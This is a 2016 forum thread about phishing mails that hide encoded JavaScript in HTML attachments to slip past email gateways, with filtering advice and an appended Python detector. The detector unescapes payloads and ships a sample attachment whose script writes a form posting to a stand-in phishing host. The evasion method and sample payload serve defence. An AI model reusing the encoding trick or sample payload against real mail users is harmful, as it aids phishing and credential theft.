1 Reply Latest reply on Jun 30, 2016 10:04 AM by runcmd

    Problem with embedded and encoded Javascripts

    marcus69

      Hi all

      This week we've discovered some mails with a nasty method of sneaking through Email Gateway filters:

      Mails come in pretending to have an embedded Excel spreadsheet hiding behind an Excel icon graphic.

      Behind that there is an attached HTML file that contains an embedded and encoded JavaScript.

      xls-fake.jpg

      Here's an excerpt of the source code within the HTML file:

      sourcecode.jpg

      The Email Gateway does not detect any JavaScript by file type here, as it is an html/txt document, and shows no offending code at first glance.

      Unescaping the code sequence reveals a phishing site in this case.

      In my opinion this is the pre-step of the next malware wave, as this bypasses AV engine and JavaScript file type detection.

      If these mails manage to get past the anti-spam and reputation filters, and you have no Web Gateway or Advanced Threat Defense, you may be doomed.

      Best Regards,

         Marcus

      PS: Did some enhanced testing on this. One solution can be to filter HTML attachments by file type. HTML email content is not affected by this, only attachments.

        • 1. Re: Problem with embedded and encoded Javascripts
          runcmd

          I might be a day late and a dollar short on this one, but...  If you create a custom compliance dictionary that applies to everything and contains the strings "<script" and/or "</script>", and then add that dictionary to the "Spam Terms" component of the anti-spam settings for your inbound mail rule, wouldn't that help stop these?  That should block anything inbound that appears to contain a script.  (Unless you actually do need to receive some messages containing scripts.)
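
An added example, not part of either post and not gateway product code: a Python sketch of a content check for the case described in this thread, which unescapes percent-encoded runs inside HTML attachments and reports markup that is invisible to a plain string match. It assumes the attachment hides its payload with JavaScript `escape()`-style `%XX`/`%uXXXX` sequences (the thread's screenshot is not available); the function names, marker list, thresholds and sample message are all constructed for illustration.

```python
import re
from email import message_from_string
from urllib.parse import unquote

# Characters JavaScript escape() can emit; long runs of them may hide markup.
CANDIDATE = re.compile(r"[A-Za-z0-9@*_+\-./%]{16,}")
ESCAPE = re.compile(r"%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2}")
MARKERS = ("<script", "<form", "<iframe", "http://", "https://")

def js_unescape(text):
    """Decode %uXXXX and %XX sequences the way JavaScript unescape() does."""
    text = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text, encoding="latin-1")

def hidden_markup(text, depth=3, min_escapes=5):
    """Return markers that only become visible after unescaping (up to `depth` layers)."""
    found = set()
    for token in CANDIDATE.findall(text) if depth else ():
        if len(ESCAPE.findall(token)) >= min_escapes:
            decoded = js_unescape(token)
            found.update(m for m in MARKERS if m in decoded.lower())
            found |= hidden_markup(decoded, depth - 1, min_escapes)
    return found

def scan_message(raw):
    """Map each HTML attachment (a part with a filename) to its hidden markers."""
    report = {}
    for part in message_from_string(raw).walk():
        if part.get_content_type() == "text/html" and part.get_filename():
            body = part.get_payload(decode=True).decode("utf-8", "replace")
            report[part.get_filename()] = sorted(hidden_markup(body))
    return report

# Constructed sample message (not taken from the thread's screenshots).
SAMPLE = """\
Subject: Invoice
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html

<html><body><p>See the attached spreadsheet.</p></body></html>
--b1
Content-Type: text/html; name="invoice.html"
Content-Disposition: attachment; filename="invoice.html"

<html><script>document.write(unescape('%3Cform%20action%3D%22https%3A//phish.example/login%22%3E%3C/form%3E'))</script></html>
--b1--
"""
```

`scan_message(SAMPLE)` returns `{'invoice.html': ['<form', 'https://']}`: the form and its target URL exist only in the decoded layer, while the HTML mail body, which has no filename, is not scanned.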